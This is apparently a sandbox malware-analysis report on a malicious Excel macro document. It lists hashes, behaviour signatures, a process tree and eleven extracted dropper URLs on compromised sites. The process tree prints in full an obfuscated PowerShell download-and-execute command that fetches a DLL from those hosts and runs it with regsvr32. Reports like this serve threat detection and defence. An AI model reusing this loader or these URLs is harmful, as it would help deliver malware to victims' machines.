Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

c192c3ce36...46.xls

windows7-x64

10

c192c3ce36...46.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 22:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c192c3ce36fe4b3fe660b6a457f2e76ff8fd456fa2bfecb55d509168fb56fd46.xls

  • Size

    88KB

  • MD5

    ca0d43edd7c6a10e83ad548eef78e7fd

  • SHA1

    839010135fa379fcb42b15243f8856096d6ce409

  • SHA256

    c192c3ce36fe4b3fe660b6a457f2e76ff8fd456fa2bfecb55d509168fb56fd46

  • SHA512

    393d83dbe691a95f56cf16e3239785d74f0edd2be194beca9a29b379e9346a6aea40baf19e0ddc66675f7de1be5cd30bc62a476f25e60c19b9d3a0327eb23f77

  • SSDEEP

    1536:zyehv7q2Pjx45uoDGTj+5xtekEvi8/dgL8EsAeE9jbDXQAhkWvgrPE4nWHPNc2At:zyehv7q2Pjx45uoDGTj+5xtekEvi8/dN

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://wearsweetbomb.com/wp-content/15zZybP1EXttxDK4JH/
exe.dropper

https://1566xueshe.com/wp-includes/z92ZVqHH8/
exe.dropper

http://mymicrogreen.mightcode.com/Fox-C/NWssAbNOJDxhs/
exe.dropper

http://o2omart.co.in/infructuose/m4mgt2MeU/
exe.dropper

http://mtc.joburg.org.za/-/GBGJeFxXWlNbABv2/
exe.dropper

http://www.ama.cu/jpr/VVP/
exe.dropper

http://actividades.laforetlanguages.com/wp-admin/dU8Ds/
exe.dropper

https://dwwmaster.com/wp-content/1sR2HfFxQnkWuu/
exe.dropper

https://edu-media.cn/wp-admin/0JAE/
exe.dropper

https://iacademygroup.cl/office/G42LJPLkl/
exe.dropper

https://znzhou.top/mode/0Qb/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c192c3ce36fe4b3fe660b6a457f2e76ff8fd456fa2bfecb55d509168fb56fd46.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\bbiwjdf.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ghkid=('$MJXdfshDrfGZses4=\"http:dhjdhjwearsweetbomb.comdhjwp-contentdhj15zZybP1EXttxDK4JHdhjbouhttps:dhjdhj1566xueshe.comdhjwp-includesdhjz92ZVqHH8dhjbouhttp:dhjdhjmymicrogreen.mightcode.comdhjFox-CdhjNWssAbNOJDxhsdhjbouhttp:dhjdhjo2omart.co.indhjinfructuosedhjm4mgt2MeUdhjbouhttp:dhjdhjmtc.joburg.org.zadhj-dhjGBGJeFxXWlNbABv2dhjbouhttp:dhjdhjwww.ama.cudhjjprdhjVVPdhjbouhttp:dhjdhjactividades.laforetlanguages.comdhjwp-admindhjdU8Dsdhjbouhttps:dhjdhjdwwmaster.comdhjwp-contentdhj1sR2HfFxQnkWuudhjbouhttps:dhjdhjedu-media.cndhjwp-admindhj0JAEdhjbouhttps:dhjdhjiacademygroup.cldhjofficedhjG42LJPLkldhjbouhttps:dhjdhjznzhou.topdhjmodedhj0Qbdhj\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\priuwdogiuwdramiuwddatiuwda\oiphilfj.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 47523){bReak;}}}').replace(\"dhj\",\"/\");iex $ghkid"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1384
        • \??\c:\windows\syswow64\regsvr32.exe
          c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3540

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilvzwjtc.ycy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize

    677B

    MD5

    a6c43a85a523f60039d88b9e890ab700

    SHA1

    557a4bcb3c37d0990957b4fa1fe9c14bc8350e02

    SHA256

    3ea43b9b999c263a94d274b12c786d92ae0c942d65507f9eef514829d8f0f226

    SHA512

    8eabb942fa449f420de92cac05852b989132655ff628cf97b7f84e6d8376ec7b0d309212394f9f767d8f35d48696fb3d0a7eaa65e73c81356a0da66ad7b650ec

    Download Submit

  • \??\c:\programdata\bbiwjdf.vbs
    Filesize

    1KB

    MD5

    7baad56cc483132b8b9cb7a14722c3b1

    SHA1

    602f7933c443765697bb178ca137f17f81856f0d

    SHA256

    31cb0d7a224f16ec4e998140c4efde8ef752295b8a88080915f0bb2b49034bee

    SHA512

    b1429608e2068dbe868254f9c3130e8ef75932169c417d0928679c3476614df588a72722e34891a2fe80db41e5e8ee054761af2f2fc3b9c6f0e956de8c9a993f

    Download Submit

  • memory/2216-146-0x0000022FC5C10000-0x0000022FC63B6000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/2216-122-0x0000022FC4E50000-0x0000022FC4E72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5008-12-0x00007FFBA1180000-0x00007FFBA1190000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-14-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-9-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-11-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-0-0x00007FFBA3230000-0x00007FFBA3240000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-7-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-6-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-13-0x00007FFBA1180000-0x00007FFBA1190000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-16-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-18-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-20-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-21-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-19-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-17-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-15-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-10-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-5-0x00007FFBA3230000-0x00007FFBA3240000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-31-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-46-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-118-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-8-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-4-0x00007FFBA3230000-0x00007FFBA3240000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-3-0x00007FFBA3230000-0x00007FFBA3240000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-132-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-133-0x00007FFBE324D000-0x00007FFBE324E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/5008-134-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-135-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-139-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-140-0x00007FFBE31B0000-0x00007FFBE33A5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5008-2-0x00007FFBA3230000-0x00007FFBA3240000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-1-0x00007FFBE324D000-0x00007FFBE324E000-memory.dmp

    Filesize

    4KB

    Download